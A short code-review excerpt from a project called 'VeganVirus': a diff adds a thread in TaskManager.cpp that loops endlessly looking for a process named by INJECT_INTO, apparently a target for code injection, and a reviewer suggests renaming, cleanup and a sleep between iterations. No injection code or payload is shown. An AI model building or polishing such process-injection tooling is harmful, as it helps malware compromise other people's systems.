VeganVirus/VeganVirus/TaskManager.cpp

```diff
@@ -0,0 +1,104 @@
+#include "TaskManager.h"
+
+DWORD WINAPI MyThreadFunction(LPVOID lpParam);
+
+DWORD WINAPI MyThreadFunction(LPVOID lpParam)
+{
+	while (1)
+	{
+		taskManager.findProcess(INJECT_INTO);
+	}
+}
```

Comment:
Change function name to a more descriptive one. Also, you can remove the declaration right before the definition of the function.
Also, please try to add a Sleep to the thread every iteration. Maybe around 5-10 seconds? No reason for it to constantly run.

Reply:
fix